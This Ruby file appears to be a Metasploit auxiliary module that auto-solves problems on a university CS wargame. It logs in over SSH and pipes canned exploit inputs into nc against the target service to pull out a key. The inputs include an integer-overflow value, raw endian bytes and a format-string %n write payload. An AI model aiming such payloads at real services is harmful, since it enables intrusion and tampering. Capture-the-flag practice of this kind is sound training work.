require 'io/console'
require 'shellwords'
require 'msf/core'
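# Auxiliary module for a CS wargame: logs in to the workstation host over SSH,
# pipes a canned per-problem payload into `nc` against the target service, and
# prints the token that follows "key: " in the service's reply.
class Metasploit3 < Msf::Auxiliary
  # Declares the module metadata and its options (workstation host, problem
  # id, target host/port, and optional website credentials).
  def initialize
    super(
      'Name' => 'CS Wargame Solver: attack',
      'Version' => '$Revision:$',
      'Description' => 'Get the key immediately by this module.',
      'Author' => ['Femi'],
      # The original keys were misspelled ('Liciense', 'Reference'), so the
      # framework never saw the license or the reference list.
      'License' => MSF_LICENSE,
      'References' => []
    )
    register_options([
      OptAddress.new('WHOST', [
        true,
        'the workstation host',
        'wargame2.cs.nctu.edu.tw'
      ]),
      OptInt.new('PROBLEM', [
        true,
        'the problem id',
        ''
      ]),
      OptAddress.new('THOST', [
        true,
        'the target host',
        ''
      ]),
      OptPort.new('TPORT', [
        true,
        'the target port',
        ''
      ]),
      OptString.new('ACCOUNT', [
        false,
        'the website account',
        ''
      ]),
      # NOTE(review): a value set through this option sits in the module
      # datastore as plain text; leaving it unset falls back to the no-echo
      # prompt in #run.
      OptString.new('PASSWORD', [
        false,
        'the website password',
        ''
      ])
    ], self.class)
  end

  # Runs the canned payload for the selected problem through the workstation
  # host and prints the key, or a hint when the target port refuses the
  # connection. Only an SSH authentication failure is rescued here; any other
  # Net::SSH error propagates to the caller.
  def run
    whost = datastore['WHOST']
    thost = datastore['THOST']
    tport = datastore['TPORT']
    raw_pid = datastore['PROBLEM']
    # The table below is keyed by Integer. Coerce so a datastore value that
    # arrives as a String (presumably possible on some framework versions;
    # verify) still matches, and an unset value falls through to "invalid".
    pid = raw_pid.to_s.to_i
    # Optional options may come back nil; normalise so #empty? cannot raise.
    account = datastore['ACCOUNT'].to_s
    password = datastore['PASSWORD'].to_s

    if account.empty?
      print "Please enter your account: "
      # Read from $stdin explicitly (Kernel#gets reads ARGF when ARGV is set)
      # and use the non-bang chomp: chomp! returns nil when nothing is removed.
      account = $stdin.gets.to_s.chomp
    end
    if password.empty?
      print "Please enter your password: "
      password = $stdin.noecho(&:gets).to_s.chomp
      puts ""
    end

    problems = {
      1 => [
        'Connect to server! easy start',
        # The account is spliced into a command line run by the remote shell,
        # so it is shell-escaped instead of wrapped in bare single quotes.
        "echo #{Shellwords.escape(account)}"
      ],
      2 => [
        '[Basic] Integer Over Flow',
        "echo 2147478598; echo 2147478598"
      ],
      3 => [
        '[Basic] endian?',
        "echo -e '\\01\\00\\00\\00\\00'"
      ],
      6 => [
        '[Basic] endian with format string',
        "echo '%255d%1$n%n%n%n'"
      ]
    }

    unless problems.key?(pid)
      puts "\e[1;31mInvalid problem id '#{raw_pid}'."
      puts "Maybe this problem hasn't been implemented yet.\e[m"
      return
    end

    title, cmd = problems[pid]
    # Host and port are also interpolated into the remote command line; escape
    # them so an option value can never add shell syntax of its own.
    safe_host = Shellwords.escape(thost.to_s)
    safe_port = Shellwords.escape(tport.to_s)
    remote_cmd = "{ #{cmd} ; } | nc -v #{safe_host} #{safe_port} | grep 'key: ' | cut -d ' ' -f 2"

    puts "Trying to solve the problem '#{title}'"
    puts "Please wait for the result..."
    begin
      # NOTE(review): only :password is passed, so host-key checking follows
      # the net-ssh library default for the installed version; confirm.
      Net::SSH.start(whost, account, :password => password) do |ssh|
        ssh.exec!(remote_cmd) do |_channel, stream, data|
          if stream == :stdout
            puts "Your key is: \e[1;33m#{data}\e[m"
          end
          # `nc -v` reports a closed port on stderr.
          if stream == :stderr && data =~ /Connection refused/
            puts "\e[1;31mThe target port #{thost}:#{tport} is not opened."
            puts "Try click the \e[43mstart\e[m\e[1;31m or \e[43mrestart\e[m\e[1;31m button on the website.\e[m"
          end
        end
      end
    rescue Net::SSH::AuthenticationFailed
      puts "\e[1;31mFail to login #{whost}"
      puts "Your account or password may be wrong.\e[m"
    end
  end
end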